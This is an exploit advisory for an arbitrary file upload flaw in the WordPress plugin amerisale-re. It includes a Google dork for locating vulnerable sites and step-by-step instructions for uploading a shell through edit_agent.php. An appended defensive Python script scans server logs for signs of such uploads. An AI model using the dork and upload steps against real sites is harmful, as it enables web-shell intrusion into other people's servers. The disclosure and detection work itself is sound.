Wordpress amerisale-re Arbitrary File Upload Vulnerability

2014.01.30
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : Wordpress amerisale-re Arbitrary File Upload Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/
# Google Dork : inurl:/wp-content/plugins/amerisale-re
# Date : 2014/01/23
# Tested on : Windows 8 , Linux
######################

Exploit :

1. Go to : http://Target.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php
2. At the end of page right click on Browse
3. Select Your File And Then Click Upload
4. Your Uploaded File (Shell Script, Pictures etc...) is shown in that page next to the browse button, right click on that and click view image

#####################################
#
# Discovered by : Spoof
#
#####################################
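For site owners checking whether this upload page has been used against them, the sketch below scans a web server access log for form submissions to edit_agent.php and for script requests by the same client afterwards. It is an added example, not part of the original advisory or the plugin; the combined log format, the /wp-content/ storage location, the extension list and the sample lines are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path taken from the advisory; compared case-insensitively (Windows hosts).
UPLOAD_PAGE = "/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php"
# Assumption: uploaded files end up somewhere under /wp-content/.
CONTENT_ROOT = "/wp-content/"
# Assumption: extensions the server hands to PHP; match your handler config.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Apache/nginx "combined" format, parsed up to the status code.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def find_upload_abuse(lines):
    """Return {client_ip: [(kind, timestamp, path, status), ...]}."""
    uploaders, findings = set(), defaultdict(list)
    for line in lines:  # lines are assumed to be in chronological order
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, status = m["ip"], m["status"]
        path = unquote(m["path"].split("?", 1)[0]).lower()
        if path == UPLOAD_PAGE:
            if m["method"] == "POST":  # form submission to the upload page
                uploaders.add(ip)
                findings[ip].append(("upload_post", m["ts"], path, status))
        elif (ip in uploaders and path.startswith(CONTENT_ROOT)
              and SCRIPT_EXT.search(path) and status.startswith("2")):
            # Same client fetched a script after uploading: review that file.
            findings[ip].append(("script_after_upload", m["ts"], path, status))
    return dict(findings)

# Constructed sample lines (documentation IP ranges, made-up file name).
_PAGE = UPLOAD_PAGE + ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jan/2014:10:01:02 +0000] "GET ' + _PAGE,
    '198.51.100.7 - - [23/Jan/2014:10:01:40 +0000] "POST ' + _PAGE,
    '198.51.100.7 - - [23/Jan/2014:10:02:05 +0000] '
    '"GET /wp-content/uploads/example.php?x=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [23/Jan/2014:10:03:00 +0000] '
    '"GET /wp-content/themes/site/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in find_upload_abuse(SAMPLE_LOG).items():
        for hit in hits:
            print(ip, *hit)
```

Any POST reported here on a site that does not expect public edits to agent listings is worth investigating, and each script_after_upload path points at a file to inspect on disk.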



Copyright 2024, cxsecurity.com

 
